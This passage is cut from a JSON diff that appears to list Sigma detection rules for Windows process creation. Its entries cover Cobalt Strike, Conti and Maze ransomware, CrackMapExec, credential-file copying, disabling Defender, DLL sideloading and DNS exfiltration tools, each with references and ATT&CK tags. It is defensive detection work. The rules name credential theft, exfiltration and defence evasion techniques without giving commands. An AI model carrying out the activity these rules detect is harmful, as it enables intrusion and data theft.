"https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf", + "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/", + "https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cobaltstrike_bloopers_modules.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.003" + ] + }, + "uuid": "4f154fb6-27d1-4813-a759-78b93e0b9c48", + "value": "Operator Bloopers Cobalt Strike Modules" + }, + { + "description": "Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.", + "meta": { + "author": "Wojciech Lesicki", + "creation_date": "2021/06/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_cobaltstrike_load_by_rundll32.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.cobaltstrike.com/help-windows-executable", + "https://redcanary.com/threat-detection-report/", + "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cobaltstrike_load_by_rundll32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ] + }, + "uuid": "ae9c6a7c-9521-42a6-915e-5aaa8689d529", + "value": "CobaltStrike Load by Rundll32" + }, + { + "description": "Detects process patterns found in Cobalt Strike beacon activity (see reference for more details) and also cases in which a China Chopper like webshell is used to run whoami", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/07/27", + "falsepositive": [ + "Other programs that cause these patterns (please report)" + ], + "filename": "proc_creation_win_cobaltstrike_process_patterns.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + 
"refs": [ + "https://hausec.com/2021/07/26/cobalt-strike-and-tradecraft/", + "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cobaltstrike_process_patterns.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "f35c5d71-b489-4e22-a115-f003df287317", + "value": "CobaltStrike Process Patterns" + }, + { + "description": "detects the usage of path traversal in cmd.exe indicating possible command/argument confusion/hijacking", + "meta": { + "author": "xknow @xknow_infosec, Tim Shelton", + "creation_date": "2020/06/11", + "falsepositive": [ + "(not much) some benign Java tools may product false-positive commandlines for loading libraries" + ], + "filename": "proc_creation_win_commandline_path_traversal.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://hackingiscool.pl/cmdhijack-command-argument-confusion-with-path-traversal-in-cmd-exe/", + "https://twitter.com/Oddvarmoe/status/1270633613449723905", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_commandline_path_traversal.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.003" + ] + }, + "uuid": "087790e3-3287-436c-bccf-cbd0184a7db1", + "value": "Cmd.exe CommandLine Path Traversal" + }, + { + "description": "Detects the attempt to evade or obfuscate the executed command on the CommandLine using bogus path traversal", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/10/26", + "falsepositive": [ + "Google Drive", + "Citrix" + ], + "filename": "proc_creation_win_commandline_path_traversal_evasion.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/hexacorn/status/1448037865435320323", + "https://twitter.com/Gal_B1t/status/1062971006078345217", 
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ] + }, + "uuid": "1327381e-6ab0-4f38-b583-4c1b8346a56b", + "value": "Command Line Path Traversal Evasion" + }, + { + "description": "Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/11/10", + "falsepositive": [ + "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" + ], + "filename": "proc_creation_win_computer_discovery_get_adcomputer.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", + "https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_computer_discovery_get_adcomputer.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033" + ] + }, + "uuid": "435e10e4-992a-4281-96f3-38b11106adde", + "value": "Computer Discovery And Export Via Get-ADComputer Cmdlet" + }, + { + "description": "detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/14", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_conhost_path_traversal.yml", + "level": "high", + "logsource.category": "process_creation", + 
"logsource.product": "windows", + "refs": [ + "https://pentestlab.blog/2020/07/06/indirect-command-execution/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_conhost_path_traversal.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.003" + ] + }, + "uuid": "ee5e119b-1f75-4b34-add8-3be976961e39", + "value": "Conhost.exe CommandLine Path Traversal" + }, + { + "description": "Conti ransomware command line ioc", + "meta": { + "author": "frack113", + "creation_date": "2021/10/12", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_conti_cmd_ransomware.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/", + "https://twitter.com/VK_Intel/status/1447795359900704769?t=Xz7vaLTvaaCZ5kHoZa6gMw&s=19", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_conti_cmd_ransomware.yml" + ], + "tags": [ + "attack.impact", + "attack.s0575", + "attack.t1486" + ] + }, + "uuid": "689308fc-cfba-4f72-9897-796c1dc61487", + "value": "Conti Ransomware Execution" + }, + { + "description": "Detects a command used by conti to dump database", + "meta": { + "author": "frack113", + "creation_date": "2021/08/16", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_conti_sqlcmd.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/vxunderground/status/1423336151860002816?s=20", + "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", + "https://docs.microsoft.com/en-us/sql/tools/sqlcmd-utility?view=sql-server-ver15", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_conti_sqlcmd.yml" + ], + 
"tags": [ + "attack.collection", + "attack.t1005" + ] + }, + "uuid": "2f47f1fd-0901-466e-a770-3b7092834a1b", + "value": "Conti Backup Database" + }, + { + "description": "Detects the malicious use of a control panel item", + "meta": { + "author": "Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_)", + "creation_date": "2020/06/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_control_panel_item.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://attack.mitre.org/techniques/T1196/", + "https://ired.team/offensive-security/code-execution/code-execution-through-control-panel-add-ins", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_control_panel_item.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1218.002", + "attack.persistence", + "attack.t1546" + ] + }, + "uuid": "0ba863e6-def5-4e50-9cea-4dd8c7dc46a4", + "value": "Control Panel Items" + }, + { + "description": "Files with well-known filenames (sensitive files with credential data) copying", + "meta": { + "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/22", + "falsepositive": [ + "Copying sensitive files for legitimate use (eg. 
backup) or forensic investigation by legitimate incident responder or forensic invetigator" + ], + "filename": "proc_creation_win_copying_sensitive_files_with_credential_data.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://room362.com/post/2013/2013-06-10-volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1/", + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_copying_sensitive_files_with_credential_data.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.003", + "car.2013-07-001", + "attack.s0404" + ] + }, + "uuid": "e7be6119-fc37-43f0-ad4f-1f3f99be2f9f", + "value": "Copying Sensitive Files with Credential Data" + }, + { + "description": "Detects usage of the copy command to copy files with the .dmp extensions from a remote share", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/27", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_copy_dmp_from_share.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_copy_dmp_from_share.yml" + ], + "tags": [ + "attack.credential_access" + ] + }, + "uuid": "044ba588-dff4-4918-9808-3f95e8160606", + "value": "Copy DMP Files From Share" + }, + { + "description": "Detects suspicious process patterns found in logs when CrackMapExec is used", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_crackmapexec_patterns.yml", 
+ "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://mpgn.gitbook.io/crackmapexec/smb-protocol/obtaining-credentials/dump-lsass", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_crackmapexec_patterns.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "f26307d8-14cd-47e3-a26b-4b4769f24af6", + "value": "CrackMapExec Process Patterns" + }, + { + "description": "Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud", + "meta": { + "author": "Max Altgelt", + "creation_date": "2022/04/06", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_creative_cloud_node_abuse.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/mttaggart/status/1511804863293784064", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_creative_cloud_node_abuse.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127", + "attack.t1059.007" + ] + }, + "uuid": "df1f26d3-bea7-4700-9ea2-ad3e990cf90e", + "value": "Node Process Executions" + }, + { + "description": "Detects dropping of dll files in system32 that may be used to retrieve user credentials from LSASS", + "meta": { + "author": "Sreeman", + "creation_date": "2020/10/29", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_credential_access_via_password_filter.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://pentestlab.blog/2020/02/10/credential-access-password-filter-dll/", + "https://github.com/3gstudent/PasswordFilter/tree/master/PasswordFilter", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_credential_access_via_password_filter.yml" + ], + 
"tags": [ + "attack.credential_access", + "attack.t1556.002" + ] + }, + "uuid": "b7966f4a-b333-455b-8370-8ca53c229762", + "value": "Dropping Of Password Filter DLL" + }, + { + "description": "Detects Credential Acquisition via Registry Hive Dumping", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/10/04", + "falsepositive": "No established falsepositives", + "filename": "proc_creation_win_credential_acquisition_registry_hive_dumping.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/credential-acquisition-via-registry-hive-dumping.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_credential_acquisition_registry_hive_dumping.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003" + ] + }, + "uuid": "4d6c9da1-318b-4edf-bcea-b6c93fa98fd0", + "value": "Credential Acquisition via Registry Hive Dumping" + }, + { + "description": "Detects Archer malware invocation via rundll32", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/06/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_crime_fireball.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.virustotal.com/en/file/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022/analysis/", + "https://www.hybrid-analysis.com/sample/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_crime_fireball.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1218.011" + ] + }, + "uuid": "3d4aebe0-6d29-45b2-a8a4-3dfde586a26d", + "value": "Fireball Archer Install" + }, + { + "description": "Detects specific process characteristics of Maze ransomware word document 
droppers", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/05/08", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_crime_maze_ransomware.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", + "https://app.any.run/tasks/51e7185c-52d7-4efb-ac0d-e86340053473/", + "https://app.any.run/tasks/65a79440-373a-4725-8d74-77db9f2abda4/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_crime_maze_ransomware.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002", + "attack.t1047", + "attack.impact", + "attack.t1490" + ] + }, + "uuid": "29fd07fc-9cfd-4331-b7fd-cc18dfa21052", + "value": "Maze Ransomware" + }, + { + "description": "Detects specific process characteristics of Snatch ransomware word document droppers", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/08/26", + "falsepositive": [ + "Scripts that shutdown the system immediately and reboot them in safe mode are unlikely" + ], + "filename": "proc_creation_win_crime_snatch_ransomware.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_crime_snatch_ransomware.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204" + ] + }, + "uuid": "5325945e-f1f0-406e-97b8-65104d393fff", + "value": "Snatch Ransomware" + }, + { + "description": "Detects command line parameters or strings often used by crypto miners", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/10/26", + "falsepositive": [ + "Legitimate use of crypto miners", + "Some 
build frameworks" + ], + "filename": "proc_creation_win_crypto_mining_monero.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.poolwatch.io/coin/monero", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_crypto_mining_monero.yml" + ], + "tags": [ + "attack.impact", + "attack.t1496" + ] + }, + "uuid": "66c3b204-9f88-4d0a-a7f7-8a57d521ca55", + "value": "Windows Crypto Mining Indicators" + }, + { + "description": "Detects a curl process start on Windows, which indicates a file download from a remote location or a simple web request to a remote server", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/07/05", + "falsepositive": [ + "Scripts created by developers and admins", + "Administrative activity" + ], + "filename": "proc_creation_win_curl_download.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_curl_download.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "bbeaed61-1990-4773-bf57-b81dbad7db2d", + "value": "Curl Usage on Windows" + }, + { + "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/03/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_cve_2021_26857_msexchange.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cve_2021_26857_msexchange.yml" + ], + "tags": [ + "attack.t1203", + "attack.execution", + "cve.2021.26857" + ] + }, + "uuid": "cd479ccc-d8f0-4c66-ba7d-e06286f3f887", + "value": "CVE-2021-26857 Exchange Exploitation" + }, + { + "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.", + "meta": { + "author": "Timur Zinniatullin, E.M. Anhaus, oscd.community", + "creation_date": "2019/10/21", + "falsepositive": [ + "Highly likely if rar is a default archiver in the monitored environment." + ], + "filename": "proc_creation_win_data_compressed_with_rar.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", + "https://eqllib.readthedocs.io/en/latest/analytics/1ec33c93-3d0b-4a28-8014-dbdaae5c60ae.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_data_compressed_with_rar.yml" + ], + "tags": [ + "attack.collection", + "attack.t1560.001" + ] + }, + "uuid": "6f3e2987-db24-4c78-a860-b4f4095a7095", + "value": "Data Compressed - rar.exe" + }, + { + "description": "Deletes the Windows systemstatebackup using wbadmin.exe.\nThis technique is used by numerous ransomware families.\nThis may only be successful on server platforms that have Windows Backup enabled.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/13", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_delete_systemstatebackup.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_delete_systemstatebackup.yml" + ], + "tags": [ + "attack.impact", + "attack.t1490" + ] + }, + "uuid": "89f75308-5b1b-4390-b2d8-d6b2340efaf8", + "value": "Wbadmin Delete Systemstatebackup" + }, + { + "description": "HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications.HxTsr.exe is part of Outlook apps, because it resides in a hidden \"WindowsApps\" subfolder of \"C:\\Program Files\". Its path includes a version number, e.g., \"C:\\Program Files\\WindowsApps\\microsoft.windowscommunicationsapps_17.7466.41167.0_x64__8wekyb3d8bbwe\\HxTsr.exe\". Any instances of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe", + "meta": { + "author": "Sreeman", + "creation_date": "2020/04/17", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_detecting_fake_instances_of_hxtsr.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_detecting_fake_instances_of_hxtsr.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ] + }, + "uuid": "4e762605-34a8-406d-b72e-c1a089313320", + "value": "Detecting Fake Instances Of Hxtsr.exe" + }, + { + "description": "Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that doesnt exist. This non-existent DLL file is named \"ShellChromeAPI.dll\". 
\nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\n", + "meta": { + "author": "@gott_cyber", + "creation_date": "2022/08/29", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_deviceenroller_evasion.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://mobile.twitter.com/0gtweet/status/1564131230941122561", + "https://strontic.github.io/xcyclopedia/library/DeviceEnroller.exe-24BEF0D6B0ECED36BB41831759FDE18D.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_deviceenroller_evasion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ] + }, + "uuid": "e173ad47-4388-4012-ae62-bd13f71c18a8", + "value": "DLL Sideloading via DeviceEnroller.exe" + }, + { + "description": "Detects the use of the Dinject PowerShell cradle based on the specific flags", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/12/07", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_dinjector.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/snovvcrash/DInjector", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dinjector.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1055" + ] + }, + "uuid": "d78b5d61-187d-44b6-bf02-93486a80de5a", + "value": "DInject PowerShell Cradle CommandLine Flags" + }, + { + "description": "Detect use of DirLister.exe", + "meta": { + "author": "frack113", + "creation_date": "2022/08/20", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_dirlister.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
"https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1083/T1083.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dirlister.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1083" + ] + }, + "uuid": "b4dc61f5-6cce-468e-a608-b48b469feaa2", + "value": "Launch DirLister Executable" + }, + { + "description": "Detects attackers attempting to disable Windows Defender using Powershell", + "meta": { + "author": "ok @securonix invrep-de, oscd.community, frack113", + "creation_date": "2020/10/12", + "falsepositive": [ + "Minimal, for some older versions of dev tools, such as pycharm, developers were known to sometimes disable Windows Defender to improve performance, but this generally is not considered a good security practice." + ], + "filename": "proc_creation_win_disable_defender_av_security_monitoring.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/", + "https://rvsec0n.wordpress.com/2020/01/24/malwares-that-bypass-windows-defender/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_disable_defender_av_security_monitoring.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "a7ee1722-c3c5-aeff-3212-c777e4733217", + "value": "Disable Windows Defender AV Security Monitoring" + }, + { + "description": "Detects when attackers use \"sc.exe\" or the powershell \"Set-Service\" cmdlet to change the startup type of a service to \"disabled\"", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/01", + "falsepositive": [ + "Administrators settings a service to 
disable via script or cli for testing purposes" + ], + "filename": "proc_creation_win_disable_service.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_disable_service.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "85c312b7-f44d-4a51-a024-d671c40b49fc", + "value": "Sc Or Set-Service Cmdlet Execution to Disable Services" + }, + { + "description": "Adversaries may search for private key certificate files on compromised systems for insecurely stored credential", + "meta": { + "author": "frack113", + "creation_date": "2021/07/20", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_discover_private_keys.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.004/T1552.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_discover_private_keys.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.004" + ] + }, + "uuid": "213d6a77-3d55-4ce8-ba74-fcfef741974e", + "value": "Discover Private Keys" + }, + { + "description": "Detects execution of Microsoft Defender's CLI process (MpCmdRun.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2022/08/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_dll_sideload_defender.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
"https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dll_sideload_defender.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ] + }, + "uuid": "7002aa10-b8d4-47ae-b5ba-51ab07e228b9", + "value": "DLL Sideloading by Microsoft Defender" + }, + { + "description": "Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/02", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_dll_sideload_vmware_xfer.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dll_sideload_vmware_xfer.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ] + }, + "uuid": "ebea773c-a8f1-42ad-a856-00cb221966e8", + "value": "DLL Sideloading by VMware Xfer Utility" + }, + { + "description": "The PowerShell implementation of DNSCat2 calls nslookup to craft queries. 
Counting nslookup processes spawned by PowerShell will show hundreds or thousands of instances if PS DNSCat2 is active locally.", + "meta": { + "author": "Cian Heasley", + "creation_date": "2020/08/08", + "falsepositive": [ + "Other powershell scripts that call nslookup.exe" + ], + "filename": "proc_creation_win_dnscat2_powershell_implementation.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/lukebaggett/dnscat2-powershell", + "https://blu3-team.blogspot.com/2019/08/powershell-dns-c2-notes.html", + "https://ragged-lab.blogspot.com/2020/06/it-is-always-dns-powershell-edition.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dnscat2_powershell_implementation.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071", + "attack.t1071.004", + "attack.t1001.003", + "attack.t1041" + ] + }, + "uuid": "b11d75d6-d7c1-11ea-87d0-0242ac130003", + "value": "DNSCat2 Powershell Implementation Detection Via Process Creation" + }, + { + "description": "Detects an attempt to add a potentially crafted DLL as a plug in of the DNS Service.\nDetects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain.\nDNS zones used to host the DNS records for a particular domain\n", + "meta": { + "author": "@gott_cyber", + "creation_date": "2022/07/31", + "falsepositive": [ + "Legitimate administration use" + ], + "filename": "proc_creation_win_dnscmd_discovery.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd", + "https://docs.microsoft.com/en-us/azure/dns/dns-zones-records", + "https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dnscmd_discovery.yml" + ], + "tags": [ + 
"attack.discovery", + "attack.execution", + "attack.t1543.003" + ] + }, + "uuid": "b6457d63-d2a2-4e29-859d-4e7affc153d1", + "value": "Discovery/Execution via dnscmd.exe" + }, + { + "description": "Well-known DNS Exfiltration tools execution", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate usage of iodine or dnscat2 — DNS Exfiltration tools (unlikely)" + ], + "filename": "proc_creation_win_dns_exfiltration_tools_execution.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dns_exfiltration_tools_execution.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.001", + "attack.command_and_control", + "attack.t1071.004", + "attack.t1132.001" + ] + }, + "uuid": "98a96a5a-64a0-4c42-92c5-489da3866cb0", + "value": "DNS Exfiltration and Tunneling Tools Execution" + }, + { + "description": "Detects the installation of a 